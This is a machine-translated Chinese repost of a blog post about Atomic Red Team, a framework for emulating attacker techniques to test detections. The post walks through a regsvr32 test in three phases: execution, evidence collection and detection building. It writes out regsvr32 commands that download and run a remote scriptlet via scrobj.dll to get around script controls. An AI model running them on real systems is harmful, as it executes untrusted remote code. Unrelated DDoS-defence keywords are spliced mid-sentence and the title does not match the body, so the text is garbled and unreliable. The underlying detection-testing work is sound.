来自 DDOS 2021-02-20 15:04 的文章

服务器攻击防护_未备案_被流量攻击该怎么办

服务器攻击防护_未备案_被流量攻击该怎么办

你怎么知道你的安全解决方案已经调整好并准备好面对真正的对手?您是否在测试新产品或现有产品以保证检测?如果你和许多团队一样,你可能缺乏内部资源或专业知识来模拟特定的对手战术或技术。这就是为什么我们最近创建了Atomic Red Team,这是一个开源的测试框架,为您提供了测试检测的能力。我们称之为"原子"来引用小型或大型安全团队可以用来良性模拟特定攻击者活动的小组件。生成的遥测数据可以用来确保你的防御系统正确地调整到该技术或工具上。您可以在此处找到框架:https://github.com/redcanaryco/atomic-red-team与凯西·史密斯和迈克尔·哈格一起观看原子红队的训练课为什么这个项目很重要我们相信,密特的团队已经收集了当前最好的进攻战术库之一。他们已经做了大量的工作,为对手生命周期中的每个阶段和战术提供参考。每一个后卫都应该成为米特的学生™ 框架*。它为理解许多攻击者使用的能力和策略提供了巨大的价值。资料来源:https://attack.mitre.org/wiki/Introduction_和_概述如何使用原子红队测试我们的原子红队测试是小型的,路由ddos防御软件,高度便携的检测测试映射到MITRE ATT&CK框架。每项测试都是为了映射到特定的策略。我们希望这能给防御者一个高度可操作的方法,立即开始测试他们的防御能力,以抵御广泛的攻击。在进行测试之前,一定要得到许可和必要的批准。未经授权的测试是一个错误的决定,并且可能是一个生成恢复的事件。设置一个与环境中的构建类似的测试机器。请确保您的collection/EDR解决方案就位,并且端点正在签入并处于活动状态。花点时间开发一个测试计划或场景。这可以采取多种形式。一个示例测试计划可以是在一个批处理文件中一次执行所有的发现阶段项,或者逐个运行每个阶段,同时验证覆盖率。示例测试:Regsvr32.exe对于本例,我们将测试Regsvr32.exe覆盖率。你应该花点时间来阅读这个策略,了解测试的背景。这是我在2016年春天发现的一种策略。我需要一种绕过脚本控制的方法。这种行为没有修补程序,作为一个签名的MS工具,它是绕过或逃避许多安全控制的简单方法。成就解锁。在Tweet上弹出Calc。"regsvr32/s/n/u/i:https://t.co/TwQTx2BhTKscrobj.dll"有空余空间-凯西·史密斯(@subee)2016年4月19日测试框架分为三个阶段:阶段1:执行测试这个特殊的测试很容易练习,webcc防御办法,因为这个工具在所有Windows工作站上都是默认的。这个测试用例的细节在这里。我们提供两种方法来执行模拟:本地或远程。另外,还提供了一个模拟的.sct文件。本地对于本地模拟,负载均衡可以防御cc攻击吗,请使用提供的.sct文件:regsvr32.exe/s/u/i:文件.sctscrobj.dll远程对于远程模拟,您需要一个可远程访问的服务器来获取/下载此文件,免费防御ddos,或使用gist:regsvr32.exe/s/u/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sctscrobj.dll一定要记下执行测试的时间。你可以根据时钟跟踪检测结果来衡量有效性。第二阶段:收集证据您的安全解决方案观察到了什么?您可能会在用户的配置文件中看到文件修改。您可以检测到regsvr32.exe与外部IP的网络连接。代理日志中可能有一个条目。你可以观察scrobj.dll正在加载Windows。或者,您可能没有观察到端点或网络上的任何行为。这就是我们测试的原因!并确定需要改进的地方。在Red Canary,我们使用EDR传感器为我们提供检测高级攻击者行为所需的可见性。在本文的剩余部分中,我们将使用炭黑响应遥测技术。上面的屏幕截图显示了我们的一位分析师在同行评议后提出的最终检测结果。我们将追溯到有助于这次探测的炭黑事件。图1.1图1.1是我们常说的炭黑艺术。在较高的层次上,您可以看到流程祖先的可视化表示。这告诉你是谁干的。虽然这对我们的分析师有帮助,但我们需要查看实际数据。图1.2在图1.2中,我们可以看到命令行和基本进程信息被收集。我们可以在这里设置各种属性的键,包括一些命令行参数。图1.3如图1.3所示,我们还可以钻取数据,观察为检索有效负载而建立的网络连接。阶段3:开发检测所以你执行了测试,没有一个防御系统开火——这就是我们测试的原因!根据您的观察和检测能力,现在是时候使用您所拥有的来尝试在您的环境中检测此事件。隔离事件后,开始查看已收集的可对其发出警报的属性。对于这个特定的例子,您可以围绕一个文件路径、一个exe、一个建立网络连接的特殊工具,用炭黑制作一个观察列表。一旦构建了检测,就应该验证检测是否正常工作以及是否进行了适当的调整。如果你把你的检测写得太宽泛,并且"检测"每一个regsvr32.exe,你将从堆积如山的误报中挖掘出来。但是,如果你写得太窄,高防cccdn,它只检测到regsvr32.exe和精确的命令行"/s/u/i",那么攻击者所要做的就是稍微修改命令行,以逃避您的检测。要找到正确的平衡,请重新运行模拟,调整检测条件,直到您觉得找到了正确的平衡。这不是一门科学。这是一个反复的过程,需要不断努力。最后但并非最不重要的是,衡量进展情况其中一个目标是根据ATT&CK矩阵来衡量您的覆盖率/能力,并确定您可能存在的差距。Roberto Rodriguez(@cyb3rWar0g)提供了这个电子表格和补充博客文章,展示了如何确定您在组织中与MITRE ATT&CK矩阵相关的位置。有了原子红队,我们现在可以模拟运行这些测试来验证检测或预防控制是否按预期运行。这个电子表格提供了丰富的知识和许多蓝色团队可以工作的方式来检测这些行为。结束语我们希望这能为您提供一些想法和功能来模拟您的环境以应对各种威胁。总会有更多的东西可以模拟。我们总是乐于接受关于如何改进的反馈。重要的是要明白,通过这些测试并不能100%保证你会发现并驱逐一个真正的对手。但是,它将帮助您找到检测管道中的漏洞,并改进总体响应,从而使攻击者的工作更加困难。首先,看看我最近和michaelhaag主持的原子红团队培训课程,他是框架开发中不可或缺的一员。我们通过三个实验来展示团队如何开始使用测试的例子。这项工作是红金丝雀团队和安全社区的几个成员的合作。我们期待您的反馈和贡献。请与我们联系research@redcanary.com有问题和反馈。*附件(&C)™ framework是MITRE的商标。